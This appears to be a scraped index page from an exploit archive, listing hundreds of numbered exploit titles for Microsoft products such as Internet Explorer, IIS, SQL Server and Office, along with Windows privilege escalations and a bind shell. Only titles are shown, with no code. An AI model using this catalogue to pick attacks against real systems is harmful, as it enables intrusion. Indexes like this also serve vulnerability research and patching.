Microsoft Internet Explorer CDisplayPointer Use-After-Free [28897] Microsoft Internet Explorer 7.0 MHTML Denial of Service Vulnerability [28880] Microsoft Internet Explorer 6.0/7.0 RemoveChild Denial of Service Vulnerability [28877] Microsoft Internet Explorer 6.0 Unspecified Code Execution Vulnerability (2) [28876] Microsoft Internet Explorer 6.0 Unspecified Code Execution Vulnerability (1) [28822] Microsoft Class Package Export Tool 5.0.2752 0 Clspack.exe Local Buffer Overflow Vulnerability [28679] Evince PDF Reader - 2.32.0.145 (Windows) and 3.4.0 (Linux) - Denial of Service [28500] Microsoft Indexing Service Query Validation Cross-Site Scripting Vulnerability [28481] MS13-069 Microsoft Internet Explorer CCaret Use-After-Free [28438] Microsoft Internet Explorer 5.0.1 Daxctle.OCX Spline Method Heap Buffer Overflow Vulnerability [28421] Microsoft Internet Explorer 6.0 - Multiple COM Object Color Property Denial of Service Vulnerabilities [28401] Microsoft Internet Explorer 6.0 Visual Studio COM Object Instantiation Denial of Service Vulnerability [28400] Microsoft Internet Explorer 6.0 TSUserEX.DLL ActiveX Control Memory Corruption Vulnerability [28389] Microsoft Internet Explorer 6.0 MSOE.DLL Denial of Service Vulnerability [28387] Microsoft Internet Explorer 6.0 IMSKDIC.DLL Denial of Service Vulnerability [28343] Microsoft Internet Explorer 6.0/7.0 IFrame Refresh Denial of Service Vulnerability [28301] Microsoft Internet Explorer 6.0 Deleted Frame Object Denial of Service Vulnerability [28286] Microsoft Internet Explorer 6.0 NDFXArtEffects Stack Overflow Vulnerability [28265] Microsoft Internet Explorer 6.0 Native Function Iterator Denial of Service Vulnerability [28259] Microsoft Internet Explorer 6.0 NMSA.ASFSourceMediaDescription Stack Overflow Vulnerability [28258] Microsoft Internet Explorer 6.0 - Multiple Object ListWidth Property Denial of Service Vulnerability [28256] Microsoft Internet Explorer 6.0 Internet.HHCtrl Click Denial of Service Vulnerability [28252] Microsoft Internet Explorer 6.0 String To Binary Function Denial of Service Vulnerability [28246] Microsoft Internet Explorer 6.0 OVCtl Denial of Service Vulnerability [28244] Microsoft Internet Explorer 6.0 DataSourceControl Denial of Service Vulnerability [28238] Microsoft SharePoint 2013 (Cloud) - Persistent Exception Handling Vulnerability MS13-067 [28226] Microsoft PowerPoint 2003 PPT File Closure Memory Corruption [28225] Microsoft PowerPoint 2003 powerpnt.exe Unspecified Issue [28224] Microsoft PowerPoint 2003 mso.dll PPT Processing Unspecified Code Execution [28222] microsoft works 8.0 spreadsheet Multiple Vulnerabilities [28213] Microsoft Internet Explorer 6.0 RevealTrans Denial of Service Vulnerability [28207] Microsoft Internet Explorer 6.0 TriEditDocument Denial of Service Vulnerability [28202] Microsoft Internet Explorer 6.0 HtmlDlgSafeHelper Remote Denial of Service Vulnerability [28198] Microsoft Office 2000/2002 Property Code Execution Vulnerability [28197] Microsoft Internet Explorer 6.0 Object.Microsoft.DXTFilter Denial of Service Vulnerability [28196] Microsoft Internet Explorer 6.0 DirectAnimation.DAUserData Denial of Service Vulnerability [28194] Microsoft Internet Explorer 6 RDS.DataControl Denial of Service Vulnerability [28189] Microsoft Excel 2000-2004 Style Handling and Repair Remote Code Execution Vulnerability [28187] MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free [28169] Microsoft Internet Explorer 5.0.1/6.0 Structured Graphics Control Denial of Service Vulnerability [28164] Microsoft Internet Explorer 6.0 Href Title Denial of Service Vulnerability [28145] Microsoft Internet Explorer 6.0 ADODB.Recordset Filter Property Denial of Service Vulnerability [28144] Microsoft Internet Explorer 6.0 OutlookExpress.AddressBook Denial of Service Vulnerability [28118] Microsoft Internet Explorer 5.0.1 OuterHTML Redirection Handling Information Disclosure Vulnerability [28087] Microsoft Office 2003 Embedded Shockwave Flash Object Security Bypass Weakness [28082] MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free [28005] Microsoft Exchange Server 2000/2003 Outlook Web Access Script Injection Vulnerability [28001] Microsoft SMB Driver Local Denial of Service Vulnerability [27984] Microsoft DXImageTransform.Microsoft.Light ActiveX Control Remote Code Execution Vulnerability [27971] Microsoft Internet Explorer 5.0.1 Frameset Memory Corruption Vulnerability [27906] Microsoft Internet Explorer 6.0 Malformed HTML Parsing Denial of Service Vulnerability [27850] Microsoft Infotech Storage Library Heap Corruption Vulnerability [27745] Outlook Express 5.5/6.0,Windows Mail MHTML URI Handler Information Disclosure Vulnerability [27744] Microsoft Internet Explorer 5.0.1 Modal Dialog Manipulation Vulnerability [27727] Microsoft Internet Explorer 6.0 Nested OBJECT Tag Memory Corruption Vulnerability [27620] Microsoft FrontPage Server Extensions Cross-Site Scripting Vulnerability [27577] Microsoft Internet Explorer 5.0 Address Bar Spoofing Vulnerability [27476] Microsoft .NET Framework SDK 1.0/1.1 MSIL Tools Buffer Overflow Vulnerabilities [27433] Microsoft Internet Explorer 5.0.1 Script Action Handler Buffer Overflow Vulnerability [27180] Windows RT ARM Bind Shell (Port 4444) [27082] Microsoft Internet Explorer 5.0.1 Malformed IMG and XML Parsing Denial of Service Vulnerability [27073] Microsoft Visual Studio UserControl Remote Code Execution Vulnerability (2) [27072] Microsoft Visual Studio UserControl Remote Code Execution Vulnerability (1) [27055] Microsoft Excel 95-2004 Malformed Graphic File Code Execution Vulnerability [26985] Microsoft Internet Explorer 5.0.1 HTML Parsing Denial of Service Vulnerabilities [26951] Windows Movie Maker 2.1.4026.0 - (.wav) Crash PoC [26869] Microsoft Excel 95/97/2000/2002/2003/2004 Unspecified Memory Corruption Vulnerabilities [26769] Microsoft Excel 95/97/2000/2002/2003/2004 Malformed Range Memory Corruption Vulnerability [26554] Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation [26517] Microsoft Office PowerPoint 2007 - Crash PoC [26457] Microsoft Internet Explorer 6.0 Malformed HTML Parsing Denial of Service Vulnerability [26292] Microsoft Internet Explorer 5.2.3 for Mac OS Denial of Service Vulnerability [26230] Microsoft IIS 5.1 WebDAV HTTP Request Source Code Disclosure Vulnerability [26175] MS13-009 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow [26167] Microsoft Visual Studio .NET msdds.dll Remote Code Execution Vulnerability [25999] Microsoft Internet Explorer textNode Use-After-Free [25992] Microsoft Internet Explorer 5.0.1 JPEG Image Rendering CMP Fencepost Denial of Service Vulnerability [25991] Microsoft Internet Explorer 5.0.1 JPEG Image Rendering Unspecified Buffer Overflow Vulnerability [25962] Microsoft ASP.NET 1.0/1.1 RPC/Encoded Remote Denial of Service Vulnerability [25912] Windows NT - Windows 8 EPATHOBJ Local Ring 0 Exploit [25784] Microsoft Outlook Express 4.x/5.x/6.0 Attachment Processing File Extension Obfuscation Vulnerability [25408] Windows Media Player 11.0.0 (.wav) - Crash PoC [25386] Microsoft Internet Explorer 5.0.1 DHTML Object Race Condition Memory Corruption Vulnerability [25385] Microsoft Internet Explorer 5.0.1 Content Advisor File Handling Buffer Overflow Vulnerability [25294] Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability [25157] Microsoft Log Sink Class ActiveX Control Arbitrary File Creation Vulnerability [25129] Microsoft Internet Explorer 6.0 Pop-up Window Title Bar Spoofing Weakness [25110] Microsoft ASP.NET 1.0/1.1 - Unicode Character Conversion Multiple Cross-Site Scripting Vulnerabilities [25095] Microsoft Internet Explorer 5.0.1 Mouse Event URI Status Bar Obfuscation Weakness [25085] Microsoft Office XP 2000/2002 HTML Link Processing Remote Buffer Overflow Vulnerability [25084] Microsoft Outlook 2003 Web Access Login Form Remote URI Redirection Vulnerability [25032] Windows Media Player 9.0 ActiveX Control File Enumeration Weakness [25031] Windows Media Player 9.0 ActiveX Control Media File Attribute Corruption Weakness [24999] Windows Light HTTPD 0.1 - Buffer Overflow [24968] Mikrotik Syslog Server for Windows 1.15 - Denial of Service [24808] Microsoft Internet Explorer 6.0 Search Pane URI Obfuscation Vulnerability [24802] Microsoft Internet Explorer 6.0 Sysimage Protocol Handler Local File Detection Vulnerability [24800] Microsoft Internet Explorer 5.0.1 FTP URI Arbitrary FTP Server Command Execution Vulnerability [24775] Microsoft Internet Explorer 6.0 Infinite Array Sort Denial of Service Vulnerability [24727] Microsoft Internet Explorer 6.0 - Local Resource Enumeration Vulnerability [24720] Microsoft Internet Explorer 6.0 IFRAME Status Bar URI Obfuscation Weakness [24714] Microsoft Internet Explorer 6.0 HTML Form Tags URI Obfuscation Weakness [24712] Microsoft Internet Explorer 6.0 TABLE Status Bar URI Obfuscation Weakness [24705] Microsoft Internet Explorer 6.0 Font Tag Denial of Service Vulnerability [24693] Microsoft Internet Explorer 5.x Valid File Drag and Drop Embedded Code Vulnerability [24687] Microsoft Outlook Express 4.x/5.x/6.0 Plaintext Email Security Policy Bypass Vulnerability [24686] Microsoft Outlook 2003 Security Policy Bypass Vulnerability [24666] Microsoft ASP.NET 1.x URI Canonicalization Unauthorized Web Access Vulnerability [24640] Microsoft SQL Server 7.0 - Remote Denial of Service Vulnerability (2) [24639] Microsoft SQL Server 7.0 - Remote Denial of Service Vulnerability (1) [24637] Windows XP TCP Packet Fragmentation Handling Denial of Service Vulnerability (4) [24636] Windows XP TCP Packet Fragmentation Handling Denial of Service Vulnerability (3) [24635] Windows XP TCP Packet Fragmentation Handling Denial of Service Vulnerability (2) [24634] Windows XP TCP Packet Fragmentation Handling Denial of Service Vulnerability (1) [24538] MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free [24495] Microsoft Internet Explorer SLayoutRun Use-After-Free (MS13-009) [24437] Apple Quick Time Player (Windows) 7.7.3 - Out of Bound Read [24407] Microsoft Internet Explorer 6.0 Resource Detection Weakness [24366] Windows Manage Memory Payload Injection [24354] Microsoft Internet Explorer 6.0 mms Protocol Handler Executable Command Line Injection Vulnerability [24328] Microsoft Internet Explorer 5.0.1 Style Tag Comment Memory Corruption Vulnerability [24281] Microsoft Systems Management Server 1.2/2.0 - Remote Denial of Service Vulnerability [24267] Microsoft Internet Explorer 6.0 JavaScript Null Pointer Exception Denial of Service Vulnerability [24266] Microsoft Internet Explorer 5.0.1 Popup.show Mouse Event Hijacking Vulnerability [24265] Microsoft Internet Explorer 5.0.1 JavaScript Method Assignment Cross-Domain Scripting Vulnerability [24249] Microsoft Internet Explorer 6.0 Shell.Application Object Script Execution Weakness [24213] Microsoft Internet Explorer 5.0.1 Wildcard DNS Cross-Site Scripting Vulnerability [24211] Microsoft Internet Explorer 6.0 HREF Save As Denial of Service Vulnerability [24187] Microsoft Internet Explorer 6.0 ADODB.Stream Object File Installation Weakness [24174] Microsoft Internet Explorer 6.0 URL Local Resource Access Weakness [24135] Microsoft Internet Explorer 5.0.1 CSS Style Sheet Memory Corruption Vulnerability [24119] Microsoft Internet Explorer 5.0.1 http-equiv Meta Tag Denial of Service Vulnerability [24118] Microsoft Outlook Express 6.0 URI Obfuscation Vulnerability [24117] Microsoft Internet Explorer 6.0 Codebase Double Backslash Local Zone File Execution Weakness [24114] Microsoft Outlook 2003Mail Client E-mail Address Verification Weakness [24112] Microsoft Internet Explorer 6.0 XML Parsing Denial of Service Vulnerability [24102] Microsoft Internet Explorer 4/5/6 Embedded Image URI Obfuscation Weakness [24101] Microsoft Outlook 2003 Predictable File Location Weakness [24069] Microsoft Internet Explorer 6.0 Meta Data Foreign Domain Spoofing Vulnerability [24020] Microsoft Internet Explorer Option Element Use-After-Free [24002] Microsoft Outlook Express 6.0 - Remote Denial of Service Vulnerability [23912] Microsoft Internet Explorer 6.0 Macromedia Flash Player Plug-in Remote Denial of Service Vulnerability [23911] Microsoft Internet Explorer 6.0 MSWebDVD Object Denial of Service Vulnerability [23903] Microsoft Internet Explorer 6.0 HTML Form Status Bar Misrepresentation Vulnerability [23796] Microsoft Outlook 2002 Mailto Parameter Quoting Zone Bypass Vulnerability [23790] Microsoft Internet Explorer 5 window.open Search Pane Cross-Zone Scripting Vulnerability [23785] Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability [23768] Microsoft Internet Explorer 6.0 window.open Media Bar Cross-Zone Scripting Vulnerability [23766] Microsoft Internet Explorer 5/6 Cross-Domain Event Leakage Vulnerability [23754] Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free Vulnerability [23695] Microsoft Internet Explorer 5.0.1 ITS Protocol Zone Bypass Vulnerability [23679] Microsoft Internet Explorer 5 Shell: IFrame Cross-Zone Scripting Vulnerability (2) [23678] Microsoft Internet Explorer 5 Shell: IFrame Cross-Zone Scripting Vulnerability (1) [23668] Microsoft Internet Explorer 5.0.1 LoadPicture File Enumeration Weakness [23649] Microsoft SQL Server Database Link Crawling Command Execution [23643] Microsoft Internet Explorer 5 NavigateAndFind() Cross-Zone Policy Vulnerability [23531] HD Soft Windows FTP Server 1.5/1.6 Username Format String Vulnerability [23493] Jordan Windows Telnet Server 1.0/1.2 Username Stack Based Buffer Overrun Vulnerability (3) [23492] Jordan Windows Telnet Server 1.0/1.2 Username Stack Based Buffer Overrun Vulnerability (2) [23491] Jordan Windows Telnet Server 1.0/1.2 Username Stack Based Buffer Overrun Vulnerability (1) [23490] Microsoft IIS 5.0 Failure To Log Undocumented TRACK Requests Vulnerability [23401] Microsoft Outlook Express 6.0 MHTML Forced File Execution Vulnerability (2) [23400] Microsoft Outlook Express 6.0 MHTML Forced File Execution Vulnerability (1) [23340] Microsoft Internet Explorer 6.0 Double Slash Cache Zone Bypass Vulnerability [23321] Microsoft Internet Explorer 6-10 Mouse Tracking [23283] Microsoft Internet Explorer 6.0 - Local Resource Reference Vulnerability [23273] Microsoft Internet Explorer 6.0 Scrollbar-Base-Color Partial Denial of Service Vulnerability [23255] Microsoft ListBox/ComboBox Control User32.dll Function Buffer Overrun Vulnerability [23216] Microsoft Word 97/98/2002 Malformed Document Denial of Service Vulnerability [23215] Microsoft Internet Explorer 6 Absolute Position Block Denial of Service Vulnerability [23131] Microsoft Internet Explorer 6.0 Script Execution Vulnerabilities [23122] Microsoft Internet Explorer 5 XML Page Object Type Validation Vulnerability [23114] Microsoft Internet Explorer 5/6 Browser Popup Window Object Type Validation Vulnerability [23113] Microsoft Exchange Server 4.0/5.0 SMTP HELO Argument Buffer Overflow Vulnerability [23096] Microsoft WordPerfect Converter Buffer Overrun Vulnerability [23095] Microsoft Access 97/2000/2002 Snapshot Viewer ActiveX Control Parameter Buffer Overflow Vulnerability [23094] Microsoft Visual Basic For Applications SDK 5.0/6.0/6.2/6.3 Document Handling Buffer Overrun Vulnerability [23083] MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day [23073] MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot) [23044] Microsoft Internet Explorer 5/6 Object Type Validation Vulnerability [23034] Microsoft URLScan 2.5/ RSA Security SecurID 5.0 Configuration Enumeration Weakness [23007] Windows AlwaysInstallElevated MSI [22959] Microsoft Outlook Express 5/6 Script Execution Weakness [22957] Microsoft SQL Server 7.0/2000,MSDE Named Pipe Denial of Service Vulnerability [22919] Microsoft ISA Server 2000 Cross-Site Scripting Vulnerabilities [22869] Microsoft Outlook 5.5/2000 Web Access HTML Attachment Script Execution Vulnerability [22850] Microsoft Office OneNote 2010 Crash PoC [22784] Microsoft Internet Explorer 5 Custom HTTP Error HTML Injection Vulnerability [22783] Microsoft Internet Explorer 5/6 MSXML XML File Parsing Cross-Site Scripting Vulnerability [22734] Microsoft Internet Explorer 6 %USERPROFILE% File Execution Weakness [22728] Microsoft Internet Explorer 5 Classic Mode FTP Client Cross Domain Scripting Vulnerability [22726] Microsoft Internet Explorer 5 OBJECT Tag Buffer Overflow Vulnerability [22679] Microsoft Visio 2010 Crash PoC [22670] Microsoft IIS 5 WebDAV PROPFIND and SEARCH Method Denial of Service Vulnerability [22655] Microsoft Publisher 2013 Crash PoC [22621] Microsoft Netmeeting 2.1/3.0.1 4.4.3385 CALLTO URL Buffer Overflow Vulnerability [22591] Microsoft Office Excel 2007 - WriteAV Crash PoC [22576] Microsoft SQL Server 7.0/2000 JET Database Engine 4.0 Buffer Overrun Vulnerability [22563] Microsoft IIS 5 User Existence Disclosure Vulnerability (2) [22562] Microsoft IIS 5 User Existence Disclosure Vulnerability (1) [22555] Microsoft BizTalk Server 2000/2002 DTA RawCustomSearchField.asp SQL Injection [22554] Microsoft BizTalk Server 2000/2002 DTA rawdocdata.asp SQL Injection Vulnerability [22553] Microsoft BizTalk Server 2002 HTTP Receiver Buffer Overflow Vulnerability [22530] Microsoft Internet Explorer 5 Remote URLMON.DLL Buffer Overflow Vulnerability [22518] Microsoft Shlwapi.dll 6.0.2800 .1106 Malformed HTML Form Tag DoS Vulnerability [22489] Windows XP PRO SP3 - Full ROP calc shellcode [22390] Microsoft ActiveSync 3.5 Null Pointer Dereference Denial of Service Vulnerability [22330] Microsoft Office Excel 2010 Crash PoC [22310] Microsoft Office Publisher 2010 Crash PoC [22288] Microsoft Internet Explorer 5/6 Self Executing HTML File Vulnerability [22280] Microsoft Outlook2000/Express 6.0 Arbitrary Program Execution Vulnerability [22251] AIX 3.x/4.x,Windows 95/98/2000/NT 4,SunOS 5 gethostbyname() Buffer Overflow [22237] Microsoft Office Picture Manager 2010 Crash PoC [22226] Microsoft Internet Explorer 5 ShowHelp Arbitrary Command Execution Vulnerability [22215] Microsoft Office Word 2010 Crash PoC [22119] Microsoft Pocket Internet Explorer 3.0 - Denial of Service Vulnerability [22027] Microsoft Java Virtual Machine 3802 Series Bytecode Verifier Vulnerability [21994] Windows Escalate Service Permissions Local Privilege Escalation [21986] Windows Media Player 10 - .avi Integer Division By Zero Crash PoC [21959] Microsoft Internet Explorer 5/6 Cached Objects Zone Bypass Vulnerability [21932] Microsoft Outlook Express 5.5/6.0 S/MIME Buffer Overflow Vulnerability [21923] MS Windows XP/2000/NT 4 NetDDE Privilege Escalation Vulnerability (2) [21922] MS Windows XP/2000/NT 4 NetDDE Privilege Escalation Vulnerability (1) [21920] Microsoft Content Management Server 2001 Cross-Site Scripting Vulnerability [21910] Microsoft IIS 5.0 IDC Extension Cross Site Scripting Vulnerability [21902] MS Windows XP/2000/NT 4 Help Facility ActiveX Control Buffer Overflow [21898] SurfControl SuperScout WebFilter for windows 2000 SQL Injection Vulnerability [21897] SurfControl SuperScout WebFilter for windows 2000 File Disclosure Vulnerability [21883] Microsoft Internet Explorer 5 Document Reference Zone Bypass Vulnerability [21845] Windows Escalate UAC Protection Bypass [21843] Windows Escalate UAC Execute RunAs [21840] MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability [21803] Microsoft Internet Explorer 6 URI Handler Restriction Circumvention Vulnerability [21750] Microsoft Internet Explorer 5 Dialog Same Origin Policy Bypass Variant Vulnerability [21749] Microsoft Internet Explorer 5/6 XML Redirect File Disclosure Vulnerability [21747] MS Windows 2000/NT 4/XP Network Share Provider SMB Request Buffer Overflow (2) [21746] MS Windows 2000/NT 4/XP Network Share Provider SMB Request Buffer Overflow (1) [21721] Microsoft Internet Explorer 4/5/6 XML Datasource Applet File Disclosure Vulnerability [21718] Microsoft SQL 2000/7.0 Agent Jobs Privilege Elevation Vulnerability [21711] Microsoft Outlook Express 5/6 MHTML URL Handler File Rendering Vulnerability [21705] Microsoft Internet Explorer 6.0 File Attachment Script Execution Vulnerability [21703] Citrix Metaframe for Windows NT 4.0 TSE 1.8 Java ICA Environment DoS [21693] Microsoft SQL Server 2000 User Authentication Remote Buffer Overflow Vulnerability [21691] MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (8) [21690] MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (7) [21689] MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (6) [21688] MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (5) [21687] MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (4) [21686] MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (3) [21685] MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (2) [21684] MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (1) [21662] Microsoft Outlook Express 6 XML File Attachment Script Execution Vulnerability [21652] Microsoft SQL Server 2000 Resolution Service Heap Overflow Vulnerability [21651] Microsoft SQL Server 2000 sp_MScopyscript SQL Injection Vulnerability [21650] Microsoft SQL Server 2000 Database Consistency Checkers Buffer Overflow Vulnerability [21631] Microsoft Outlook Express 5/6 Spoofable File Extensions Vulnerability [21625] Trend Micro InterScan VirusWall for Windows NT 3.52 Space Gap Scan Bypass [21613] Microsoft IIS 4/5 SMTP Service Encapsulated SMTP Address Vulnerability [21601] Microsoft Foundation Class Library 7.0 ISAPI Buffer Overflow Vulnerability [21556] Microsoft Internet Explorer 5/6 CSSText Bold Font Denial of Service [21555] Cisco Secure ACS for Windows NT 3.0 Cross-site Scripting Vulnerability [21549] Microsoft SQL Server 2000 Password Encrypt Procedure Buffer Overflow Vulnerability [21541] Microsoft SQL Server 2000 SQLXML Script Injection Vulnerability [21540] Microsoft SQL Server 2000 SQLXML Buffer Overflow Vulnerability [21530] Seanox DevWex Windows Binary 1.2002.520 File Disclosure [21481] Microsoft MSN Messenger 1-4 Malformed Invite Request Denial of Service [21452] Microsoft Internet Explorer 5.0.1/6.0 Content-Disposition Handling File Execution Vulnerability [21419] Microsoft Outlook Express 5.5 DoS Device Denial of Service Vulnerability [21404] Microsoft Internet Explorer 5/6 Self-Referential Object Denial of Service Vulnerability [21402] OpenSSH 2.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability [21387] WebTrends Reporting Center for Windows 4.0 d GET Request Buffer Overflow [21385] Microsoft IIS 5.0 CodeBrws.ASP Source Code Disclosure Vulnerability [21376] Microsoft Internet Explorer 5.5/6.0 History List Script Injection Vulnerability [21372] Microsoft IIS 4/5 HTTP Error Page Cross Site Scripting Vulnerability [21371] Microsoft IIS 4.0/5.0 Chunked Encoding Transfer Heap Overflow Vulnerability (4) [21370] Microsoft IIS 4.0/5.0 Chunked Encoding Transfer Heap Overflow Vulnerability (3) [21369] Microsoft IIS 4.0/5.0 Chunked Encoding Transfer Heap Overflow Vulnerability (2) [21368] Microsoft IIS 4.0/5.0 Chunked Encoding Transfer Heap Overflow Vulnerability (1) [21361] Microsoft Internet Explorer 5 Cascading Style Sheet File Disclosure Vulnerability [21313] Microsoft IIS 4.0/5.0/5.1 Authentication Method Disclosure Vulnerability [21260] Microsoft Site Server 3.0 Cross-Site Scripting Vulnerability [21225] John Roy Pi3Web 2.0 For Windows Long Request Buffer Overflow Vulnerability [21199] Microsoft Internet Explorer 5 JavaScript Local File Enumeration Vulnerability (2) [21198] Microsoft Internet Explorer 5 JavaScript Local File Enumeration Vulnerability (1) [21195] Microsoft Internet Explorer 5/6 GetObject File Disclosure Vulnerability [21189] Windows 98/XP/ME UPnP NOTIFY Buffer Overflow Vulnerability (2) [21188] Windows 98/XP/ME UPnP NOTIFY Buffer Overflow Vulnerability (1) [21177] Microsoft IIS 5.0 False Content-Length Field DoS Vulnerability [21164] Microsoft Internet Explorer 5.5/6.0 Spoofable File Extensions Vulnerability [21144] Microsoft Internet Explorer 5/6 Cookie Disclosure/Modification Vulnerability [21127] Microsoft Internet Explorer 5/6 JavaScript Interface Spoofing Vulnerability [21118] Microsoft Internet Explorer 5 Zone Spoofing Vulnerability [21113] Microsoft Index Server 2.0 File Information and Path Disclosure Vulnerability [21072] Microsoft IIS 5.0 In-Process Table Privelege Elevation Vulnerability [21071] Microsoft IIS 4/5 SSI Buffer Overrun Privelege Elevation [21040] Windows 98 ARP Denial of Service Vulnerability [21004] Microsoft Outlook 98/2000/2002 Arbitrary Code Execution Vulnerability [21003] Microsoft Outlook 98/2000/2002 Unauthorized Email Access Vulnerability [20997] HP-UX 11,Linux kernel 2.4,Windows 2000/NT 4.0,IRIX 6.5 Small TCP MSS DoS [20991] Microsoft IIS 4.0/5.0 Device File Remote DoS Vulnerability [20989] Microsoft IIS 4.0/5.0 Device File Local DoS Vulnerability [20912] Trend Micro InterScan VirusWall for Windows NT 3.51 Configurations Modification Vulnerability [20903] Microsoft Internet Explorer 5.5 File Disclosure Vulnerability [20899] Microsoft Outlook 97/98/2000/4/5 Address Book Spoofing Vulnerability [20893] Trend Micro InterScan VirusWall for Windows NT 3.4/3.5/3.51 Remote Reconfiguration Vulnerability [20880] MS Windows 2000 Debug Registers Vulnerability [20846] Microsoft IIS 4.0/5.0 FTP Denial of Service Vulnerability [20818] Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (4) [20817] Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (3) [20816] Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (2) [20815] Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (1) [20814] FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (5) [20813] FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (4) [20812] FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (3) [20811] FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (2) [20810] FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (1) [20802] Microsoft IIS 2.0/3.0 Long URL Denial of Service Vulnerability [20782] Microsoft IE 5.0/5.5 and OE 5.5 XML Stylesheets Active Scripting Vulnerability [20770] GoAhead Software GoAhead Webserver (Windows) 2.1 - Denial of Service [20763] Microsoft ISA Server 2000 Web Proxy DoS Vulnerability [20688] Qualcomm Eudora 5.0.2 'Use Microsoft Viewer' Code Execution Vulnerability [20680] Microsoft IE 5.0.1/5.5/6.0 Telnet Client File Overwrite Vulnerability [20664] Microsoft IIS 5.0 WebDAV Denial of Service Vulnerability [20605] Apple Quicktime plugin - Windows 4.1.2 (Japanese) Remote Overflow Vulnerability [20590] Microsoft IIS 3.0/4.0 Upgrade BDIR.HTR Vulnerability [20571] Microsoft Outlook 2000 0/98 0/Express 5.5 Concealed Attachment Vulnerability [20543] Windows Service Trusted Path Privilege Escalation [20515] Microsoft Internet Explorer 5.0.1/5.5 'mstask.exe' CPU Consumption Vulnerability [20508] Microsoft NT 4.0 RAS/PPTP Malformed Control Packet Denial of Service Attack [20491] KTH Kerberos 4 Arbitrary Proxy Usage Vulnerability [20481] Microsoft IIS 2.0/3.0 Appended Dot Script Source Disclosure Vulnerability [20472] IBM DB2 Universal Database for Linux 6.1/Windows NT 6.1 Known Default Password Vulnerability [20470] IBM DB2 Universal Database for Windows NT 6.1/7.1 SQL DoS Vulnerability [20459] Microsoft Internet Explorer 5 \'INPUT TYPE=FILE\' Vulnerability [20457] Microsoft SQL Server 7.0/2000,Data Engine 1.0/2000 xp_peekqueue Buffer Overflow Vulnerability [20456] Microsoft SQL Server 7.0/2000,Data Engine 1.0/2000 xp_showcolv Buffer Overflow Vulnerability [20451] Microsoft SQL Server 7.0/2000,Data Engine 1.0/2000 xp_displayparamstmt Buffer Overflow Vulnerability [20440] "Windows 3.11/95/NT 4.0/NT 3.5.1 ""Out Of Band"" Data Denial of Service (4)" [20439] "Windows 3.11/95/NT 4.0/NT 3.5.1 ""Out Of Band"" Data Denial of Service (3)" [20438] "Windows 3.11/95/NT 4.0/NT 3.5.1 ""Out Of Band"" Data Denial of Service (2)" [20437] "Windows 3.11/95/NT 4.0/NT 3.5.1 ""Out Of Band"" Data Denial of Service (1)" [20426] Microsoft Internet Explorer 5.5 Index.dat Vulnerability [20384] Microsoft IIS 4.0/5.0 Executable File Parsing Vulnerability [20383] Microsoft IIS 4.0 ISAPI Buffer Overflow Vulnerability [20324] iplanet certificate management system 4.2 for windows nt 4.0 - Directory Traversal [20310] Microsoft IIS 4.0 Pickup Directory DoS Vulnerability [20309] Microsoft IIS 3.0 newdsn.exe File Creation Vulnerability [20306] Microsoft Virtual Machine Arbitrary Java Codebase Execution Vulnerability [20305] Microsoft Site Server 2.0 with IIS 4.0 - File Upload Vulnerability [20289] Microsoft NetMeeting 3.0.1 4.4.3385 Remote Desktop Sharing DoS Vulnerability [20269] Microsoft IIS 5.0 Indexed Directory Disclosure Vulnerability [20235] Cisco Secure ACS for Windows NT 2.42 Buffer Overflow Vulnerability [20232] MS Windows 2000/NT 4 DLL Search Path Weakness [20219] WebTV for Windows 98/ME DoS Vulnerability [20181] Kerberos 4 4.0/5 5.0 KDC Spoofing Vulnerability [20174] Microsoft Internet Explorer Fixed Table Col Span Heap Overflow [20152] "Microsoft IIS 5.0 ""Translate: f"" Source Disclosure Vulnerability (2)" [20151] "Microsoft IIS 5.0 ""Translate: f"" Source Disclosure Vulnerability (1)" [20122] Microsoft Office SharePoint Server 2007 Remote Code Execution [20096] Microsoft IIS 2.0/3.0/4.0/5.0/5.1 Internal IP Address Disclosure Vulnerability [20089] Microsoft IIS 4.0/5.0 Source Fragment Disclosure Vulnerability [20079] Microsoft Outlook 97/98/2000, Outlook Express 4.0/5.0 GMT Field Buffer Overflow (2) [20078] Microsoft Outlook 97/98/2000, Outlook Express 4.0/5.0 GMT Field Buffer Overflow (1) [20006] Windows NT 4.0 - Remote Registry Request Dos Vulnerability (2) [20005] Windows NT 4.0 - Remote Registry Request Dos Vulnerability (1) [19968] Windows 2000/95/98/NT 4.0 Long Filename Extension Vulnerability [19930] Windows Escalate Task Scheduler XML Privilege Escalation [19928] Microsoft Active Movie Control 1.0 Filetype Vulnerability [19926] Cygnus Network Security 4.0/KerbNet 